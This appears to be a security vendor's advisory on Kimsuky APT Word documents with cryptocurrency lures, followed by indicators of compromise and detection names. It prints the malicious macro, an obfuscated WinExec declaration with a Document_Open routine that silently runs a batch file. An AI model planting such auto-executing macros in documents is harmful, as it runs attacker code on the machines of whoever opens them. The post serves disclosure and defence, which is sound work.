On March 21st, the ASEC analysis team has discovered the Kimsuky group’s APT attacks that use Word files containing information about cryptocurrency. A total of three Word files were discovered that were used as baits for the attacks. The macro’s author and its execution flow are identical to that which was introduced in the ASEC blog post uploaded on March 17th (Title: Malicious Word Files Disguised as Product Introduction). It appears that all three files are properly created Word files containing malicious macro codes, and seeing how the text is related to cryptocurrency, the attacker must have been targeting cryptocurrency companies. All the Word files were modified by an author named Acer, and seeing how they were modified on the morning of March 21st, the files may be used when the attacker launches their attack. This warrants extreme caution.
- Regarding Quantity of Stakeholder.doc (Modified by: Acer, Date Modified: 2022-03-21 10:29 AM)
- Assets and Liabilities Status.doc (Modified by: Acer, Date Modified: 2022-03-21 11:10 AM)
- The 3rd Stakeholder Meeting.doc (Modified by: Acer, Date Modified: 2022-03-21 11:03 AM)
All three Word files used the same macro, and its feature matches those of the macro code in temp.doc that was introduced in the following blog post.
- Feature: run “C:\Users\Public\Documents\no1.bat”
Private Declare PtrSafe Function NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long Sub Document_Open() NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnGUYNUeNUrpXVpyNpDYkWbfyp4YLUJGqXtYK3VpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrp "C:\Users\Public\Documents\no1.bat", 0 End Sub
The one that runs “no1.bat” file seems to have been by a different Word file, not the collected file. As introduced in one of the past blog posts, it appears that this was created by the macro that prompts users to click Enable Macro button (see Figure 5).
Ultimately, it has been confirmed that the same distribution method and execution flow are adopted by both the malicious Word files disguised as the product introduction files and the Word files of this case. This means that the attacker is attacking virtual asset providers as well as distribution and shopping industries.
Files may ask users to press the button ‘Enable Content’, but users should refrain from pressing the button of the files from unknown sources (see Figure 5).
AhnLab’s anti-malware product, V3, is monitoring such attacks and detects them using the alias below.
– cloudy.bat : 0ecc9a4cea5c289732c76234c47a60e9
– download.vbs : 82ed73e4adbe5c26bafb5072657fd46b
– no4.bat : 7a2f350a2a6aa1d065c2b19be6dc6fb4
– start.vbs : 8a2eeafca1b33010d7ed812cf17d42f5
– upload.vbs : 869f98aac4963c7db7276d2a914d081e
– Assets and Liabilities Status.doc: a872dbb06e2dc721f180d05e2c1c8c20
– The 3rd Stakeholder Meeting.doc: 56a936b9b3a3bdafed40cf5d056febaf
– Regarding Quantity of Stakeholder.doc: dc0223fb97891a90049d0c0d2beeb756
[Detection Name (Engine ver.)]
– cloudy.bat : Trojan/VBS.Akdoor (2022.03.23.00)
– download.vbs : Downloader/VBS.Generic (2022.03.23.00)
– no4.bat : Trojan/BAT.Agent (2022.03.23.00)
– start.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– upload.vbs : Trojan/VBS.Akdoor (2022.03.23.00)
– Assets and Liabilities Status.doc: Trojan/DOC.Agent (2022.03.23.00)
– The 3rd Stakeholder Meeting.doc: Trojan/DOC.Agent (2022.03.23.00)
– Regarding Quantity of Stakeholder.doc: Trojan/DOC.Agent (2022.03.23.00)
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.